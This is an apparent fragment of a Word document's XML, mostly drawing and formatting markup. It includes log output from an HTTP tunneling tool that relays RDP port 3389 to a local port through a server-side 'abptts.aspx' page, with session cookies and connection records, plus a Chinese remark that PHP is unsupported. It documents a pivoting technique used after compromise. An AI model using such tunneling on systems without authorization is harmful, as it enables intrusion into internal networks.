,13912,2785,13916,2785,13920,2785,13924,2785,13928,2785,13933,2785,13937,2785,13942,2785,13947,2785,13951,2785,13956,2785,13961,2785,13966,2785,13971,2785,13977,2785,13982,2785,13987,2785,13993,2785,13999,2785,14004,2785,14010,2785,14016,2785,14022,2785,14028,2785,14035,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2784,14041,2784,14041,2784,14041,2784,14041,2784,14041,2784,14041,2783,14041,2783,14041,2783,14041,2783,14041,2783,14041,2782,14041,2782,14041,2782,14041,2781,14041,2781,14041,2781,14041,2780,14041,2780,14041,2780,14041,2779,14041,2779,14041,2778,14041,2778,14041,2778,14041,2777,14041,2776,14041,2776,14041,2775,14041,2775,14041,2774,14041,2774,14041,2773,14041,2772,14041,2772,14041,2771,14041,2770,14041,2769,14041,2768,14041,2768,14041,2767,14041,2766,14041,2765,14041,2764,14041,2763,14041,2762,14041,2761,14041,2760,14041,2759,14041,2758,14041,2757,14041,2755,14041,2754,14041,2753,14041,2752,14041,2750,14041,2749,14041,2748,14041,2746,14041,2745,14041,2743,14041,2742,14041,2740,14041,2738,14041,2737,14041,2735,14041,2733,14041,2732,14041,2730,14041,2728,14041,2726,14041,2724,14041,2722,14041,2720,14041,2718,14041,2716,14041,2714,14041,2712,14041,2710,14041,2708,14041,2705,14041,2703,14041,2701,14041,2698,14041,2696,14041,2693,14041,2691,14041,2688,14041,2685,14041,2683,14041,2680,14041,2677,14041,2674,14041,2671,14041,2668,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14040,2665,14040,2665,14040,2665,14040,2665,14040,2665,14040,2665,14039,2665,14039,2665,14039,2665,14039,2665,14038,2665,14038,2665,14038,2665,14037,2665,14037,2665,14037,2665,14036,2665,14036,2665,14035,2665,14035,2665,14034,2665,14033,2665,14033,2665,14032,2665,14031,2665,14031,2665,14030,2665,14029,2665,14028,2665,14027,2665,14026,2665,14025,2665,14024,2665,14023,2665,14022,2665,14021,2665,14020,2665,14019,2665,14017,2665,14016,2665,14014,2665,14013,2665,14012,2665,14010,2665,14008,2665,14007,2665,14005,2665,14003,2665,14001,2665,13999,2665,13998,2665,13996,2665,13993,2665,13991,2665,13989,2665,13987,2665,13985,2665,13982,2665,13980,2665,13977,2665,13975,2665,13972,2665,13969,2665,13966,2665,13964,2665,13961,2665,13958,2665,13955,2665,13951,2665,13948,2665,13945,2665,13941,2665,13938,2665,13934,2665,13931,2665,13927,2665,13923,2665,13919,2665,13915,2665,13911,2665,13907,2665,13903,2665,13899,2665,13894,2665,13890,2665,13885,2665,13880,2665,13876,2665,13871,2665,13866,2665,13861,2665,13856,2665,13850,2665,13845,2665,13840,2665,13834,2665,13828,2665,13823,2665,13817,2665,13811,2665,13805,2665,13799,2665,13792,2665,13786e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:688.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,13770" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:13770;width:130;height:270" coordorigin="3010,13770" coordsize="130,270" path="m3026,13786l3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3027,13786,3027,13786,3027,13786,3027,13786,3027,13786,3027,13786,3027,13786,3028,13786,3028,13786,3028,13786,3028,13786,3029,13786,3029,13786,3029,13786,3029,13786,3030,13786,3030,13786,3030,13786,3031,13786,3031,13786,3032,13786,3032,13786,3032,13786,3033,13786,3033,13786,3034,13786,3034,13786,3035,13786,3036,13786,3036,13786,3037,13786,3037,13786,3038,13786,3039,13786,3039,13786,3040,13786,3041,13786,3042,13786,3043,13786,3043,13786,3044,13786,3045,13786,3046,13786,3047,13786,3048,13786,3049,13786,3050,13786,3051,13786,3052,13786,3053,13786,3054,13786,3056,13786,3057,13786,3058,13786,3059,13786,3061,13786,3062,13786,3063,13786,3065,13786,3066,13786,3068,13786,3069,13786,3071,13786,3072,13786,3074,13786,3076,13786,3077,13786,3079,13786,3081,13786,3083,13786,3085,13786,3087,13786,3089,13786,3091,13786,3093,13786,3095,13786,3097,13786,3099,13786,3101,13786,3103,13786,3106,13786,3108,13786,3110,13786,3113,13786,3115,13786,3118,13786,3120,13786,3123,13786,3126,13786,3128,13786,3131,13786,3134,13786,3137,13786,3140,13786,3143,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13787,3146,13787,3146,13787,3146,13787,3146,13787,3146,13787,3146,13788,3146,13788,3146,13788,3146,13788,3146,13789,3146,13789,3146,13789,3146,13790,3146,13790,3146,13790,3146,13791,3146,13791,3146,13792,3146,13792,3146,13793,3146,13794,3146,13794,3146,13795,3146,13796,3146,13796,3146,13797,3146,13798,3146,13799,3146,13800,3146,13801,3146,13802,3146,13803,3146,13804,3146,13805,3146,13806,3146,13807,3146,13808,3146,13810,3146,13811,3146,13813,3146,13814,3146,13815,3146,13817,3146,13819,3146,13820,3146,13822,3146,13824,3146,13826,3146,13828,3146,13829,3146,13831,3146,13834,3146,13836,3146,13838,3146,13840,3146,13842,3146,13845,3146,13847,3146,13850,3146,13852,3146,13855,3146,13858,3146,13861,3146,13863,3146,13866,3146,13869,3146,13873,3146,13876,3146,13879,3146,13882,3146,13886,3146,13889,3146,13893,3146,13896,3146,13900,3146,13904,3146,13908,3146,13912,3146,13916,3146,13920,3146,13924,3146,13928,3146,13933,3146,13937,3146,13942,3146,13947,3146,13951,3146,13956,3146,13961,3146,13966,3146,13971,3146,13977,3146,13982,3146,13987,3146,13993,3146,13999,3146,14004,3146,14010,3146,14016,3146,14022,3146,14028,3146,14035,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3144,14041,3144,14041,3144,14041,3144,14041,3144,14041,3144,14041,3143,14041,3143,14041,3143,14041,3143,14041,3143,14041,3142,14041,3142,14041,3142,14041,3141,14041,3141,14041,3141,14041,3140,14041,3140,14041,3140,14041,3139,14041,3139,14041,3138,14041,3138,14041,3137,14041,3137,14041,3136,14041,3136,14041,3135,14041,3134,14041,3134,14041,3133,14041,3132,14041,3132,14041,3131,14041,3130,14041,3129,14041,3129,14041,3128,14041,3127,14041,3126,14041,3125,14041,3124,14041,3123,14041,3122,14041,3121,14041,3120,14041,3119,14041,3118,14041,3117,14041,3116,14041,3114,14041,3113,14041,3112,14041,3110,14041,3109,14041,3108,14041,3106,14041,3105,14041,3103,14041,3102,14041,3100,14041,3099,14041,3097,14041,3095,14041,3094,14041,3092,14041,3090,14041,3088,14041,3086,14041,3084,14041,3083,14041,3081,14041,3079,14041,3076,14041,3074,14041,3072,14041,3070,14041,3068,14041,3065,14041,3063,14041,3061,14041,3058,14041,3056,14041,3053,14041,3051,14041,3048,14041,3045,14041,3043,14041,3040,14041,3037,14041,3034,14041,3031,14041,3029,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14040,3026,14040,3026,14040,3026,14040,3026,14040,3026,14040,3026,14039,3026,14039,3026,14039,3026,14039,3026,14038,3026,14038,3026,14038,3026,14037,3026,14037,3026,14037,3026,14036,3026,14036,3026,14035,3026,14035,3026,14034,3026,14033,3026,14033,3026,14032,3026,14031,3026,14031,3026,14030,3026,14029,3026,14028,3026,14027,3026,14026,3026,14025,3026,14024,3026,14023,3026,14022,3026,14021,3026,14020,3026,14019,3026,14017,3026,14016,3026,14014,3026,14013,3026,14012,3026,14010,3026,14008,3026,14007,3026,14005,3026,14003,3026,14001,3026,13999,3026,13998,3026,13996,3026,13993,3026,13991,3026,13989,3026,13987,3026,13985,3026,13982,3026,13980,3026,13977,3026,13975,3026,13972,3026,13969,3026,13966,3026,13964,3026,13961,3026,13958,3026,13955,3026,13951,3026,13948,3026,13945,3026,13941,3026,13938,3026,13934,3026,13931,3026,13927,3026,13923,3026,13919,3026,13915,3026,13911,3026,13907,3026,13903,3026,13899,3026,13894,3026,13890,3026,13885,3026,13880,3026,13876,3026,13871,3026,13866,3026,13861,3026,13856,3026,13850,3026,13845,3026,13840,3026,13834,3026,13828,3026,13823,3026,13817,3026,13811,3026,13805,3026,13799,3026,13792,3026,1378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29.077967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Disengaging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tunnel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.3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8861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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="0" w:firstLine="0"/>
      </w:pP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33389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3389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29.077987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Closing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socket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.3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8861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33389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41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29.078049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Exception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while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closing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client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socket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.3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8861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33389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Errno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107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Transport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endpoint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is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ot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connected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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29.085280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closed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connection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CEA116F4AF1FA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F8C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36.957446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Client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connected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33389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36.957601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Waiting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client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connection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11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="0" w:firstLine="0"/>
      </w:pP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333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89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5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36.957797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Connecting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3389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via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.119/abptts.aspx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36.966507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cookie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ASP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NET_SessionId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bsynu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c3l5ndo5h0n0bhtrv5p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path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HttpOnly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="144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36.966587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S2C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3389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33389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.3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8862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Connection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ID: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AA0FE7F073A5EFFD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created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connection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AA0FE7F073A5EFFD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="10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45.321612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C2S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8862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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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389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3389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Connection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ID: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AA0FE7F073A5EFFD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25805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bytes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sent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since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last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report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="144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45.321700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S2C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3389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33389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.3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8862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Connection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ID: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AA0FE7F073A5EFFD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12344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bytes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sent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since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last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report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="10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48.482758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C2S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8862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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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389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3389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Connection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ID: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AA0FE7F073A5EFFD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715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bytes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ent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since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last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report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="144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48.482838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S2C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3389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33389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.3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8862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Connection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ID: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AA0FE7F073A5EFFD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2524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bytes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sent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since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last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report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="107" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263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54.169354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Connection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‐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level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exception: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Errno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onnection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reset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by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peer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tunnel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.3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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8862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33389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3389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9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54.169432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Disengaging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tunnel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.3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8862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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="0" w:firstLine="0"/>
      </w:pP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33389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3389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54.169455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Closing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client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socket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.3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8862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33389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41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54.169529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Exception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while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closing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client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socket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.3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8862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33389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Errno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107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Transport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endpoint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is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ot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connected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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28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33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54.178078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closed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connection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AA0FE7F073A5E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FFD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="12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32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177.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:266.399pt;width:388.800pt;height:243.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:454.200pt;margin-top:600.0pt;width:7.200pt;height:8.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16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非常遗憾的是，目前不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支持PHP。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